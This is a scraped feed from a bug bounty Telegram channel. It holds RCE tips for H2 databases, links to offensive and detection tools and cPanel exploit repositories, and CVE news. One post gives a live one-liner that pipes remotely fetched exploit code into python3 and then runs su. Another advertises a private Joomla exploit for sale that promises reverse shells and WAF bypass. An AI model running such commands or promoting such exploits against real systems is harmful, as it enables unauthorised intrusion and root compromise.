Brut Security
15.6K subscribers
1.01K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Hey Hunter's,
DarkShadow is here back again!

🚨 Import schema from H2 Database β†’ RCE via EXEC Alias ⚑

Creating an alias to execute system commands via Java Runtime

πŸ” Quick Analysis:
- Default oken validation
- H2 database exposed with unsafe configurations
- Ability to create custom ALIAS β†’ leads to RCE
- No proper input validation or restriction on JDBC params


ο»Ώ
🧠 Bug Bounty Tips:


- Always check hidden/internal endpoints like "/getSchema", "/actuator", "/env"
- Look for H2 / embedded DB usage β†’ often misconfigured
- Try injecting JDBC params (INIT, TRACE, etc.)
- Don’t ignore default tokens or exposed headers
- Think beyond SQLi β†’ DB features themselves can be weaponize
d



So guys if you really enjoy to read such methods show your love ❀️

#bugbountytips #rce
❀7😱5
πŸ”₯ Ultimate Bug Bounty Goldmine β€” 1000+ Real Writeups

XSS, CSRF, SSRF, IDOR, SQLi, RCE… everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.

Perfect for learning real-world exploitation, not just theory.

GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
❀5πŸ”₯4
Please open Telegram to view this post
VIEW IN TELEGRAM
❀6πŸ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
❀3
🦊 CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

https://github.com/BishopFox/cloudfox
❀8πŸ‘3πŸ”₯3
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support !

Here is 10 coupons who want to grab it for free --
https://topmate.io/saumadip/2054509?coupon_code=qwerty
❀4πŸ”₯2
Reconnaissance- Phase1.pdf
1.5 MB
β˜„οΈBug Bounty Reconnaissance-Phase 1β˜„οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
❀9πŸ”₯4πŸ‘¨β€πŸ’»1
πŸ”₯ GitHub RCE via single git push!

CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).

πŸ”— Learn how header injection led to full compromise β†’ https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
πŸ”₯8πŸ‘6❀4
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!


🚨History Breaking exploit😳

CVE-2026-31431 (nickname: copy fail)

A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!

Exploit code:
curl copy.fail/exp | python3 && su


Guys, AI is going to be very dangerous😨

Don't forget to follow me x.com/darkshadow2bd

#exploit #bugbountytips #linux
❀7πŸ”₯4πŸ‘2
Behind every secure system,
there’s someone putting in the work no one sees.

Late nights, constant learning, silent defense.

This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world.

Respect the grind.

Happy Labour Day.

#LabourDay #CyberSecurity #EthicalHacking #BrutSecurity
❀7πŸ”₯4πŸ‘1
Wishing you peace and clarity this Buddha Purnima.
❀3
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”₯CVE-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator

🚨https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
Please open Telegram to view this post
VIEW IN TELEGRAM
1❀19
πŸ₯Ί If you found the posts helpful, drop a like on the post.

It helps us reach more people and keeps us motivated to share better content.
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10πŸ”₯8
🚨 cPanelSniper β€” CVE-2026-41940

cPanel & WHM'de CVSS 10.0 kritik auth bypass.

CRLF injection β†’ session file poisoning β†’ root WHM access.

https://github.com/ynsmroztas/cPanelSniper
❀16πŸ™3
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”₯ JOOMLA PRO EXPLOIT v2026 πŸ”₯

The best private Joomla exploit injects an immediate reverse shell on all versions.

βœ… SVG upload + rename to .php (total bypass)
βœ… Automatic bypass of WAF and Cloudflare
βœ… Automatic fallback via installTemplate (remote ZIP)
βœ… 50 threads – scans 5+ directories and subpaths in seconds
βœ… Updated with newly discovered CVE-2026

πŸ“Œ Unique Feature:

Automatically detects CSRF token
Tests 15 upload directories (webroot, admin, images, tmp, etc.)

DM πŸ‘‰ @Mm_fit 🦊

πŸš€ LAST 3 SPOTS AVAILABLE!

Channel: https://t.me/cve0day

#AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❀7
⚠️403 bypass tools for bug bounty hunters:

bypass-403 β†’ https://github.com/iamj0ker/bypass-403
nomore403 β†’ https://github.com/devploit/nomore403
4-ZERO-3 β†’ https://github.com/Dheerajmadhukar/4-ZERO-3
byp4xx β†’ https://github.com/lobuhi/byp4xx
dontgo403 β†’ https://github.com/mbrg/dontgo403
Please open Telegram to view this post
VIEW IN TELEGRAM
❀15πŸ‘2πŸ‘¨β€πŸ’»2
1600+ tested regex patterns for detecting secrets, API keys, passwords, and tokens

β€’ Works with TruffleHog and Gitleaks
β€’ ReDoS-safe patterns
β€’ Confidence-based categorization

Limited regex coverage = missed secrets

https://github.com/mazen160/secrets-patterns-db

#AppSec #DevSecOps #BugBounty
πŸ‘9πŸ‘2πŸ—Ώ1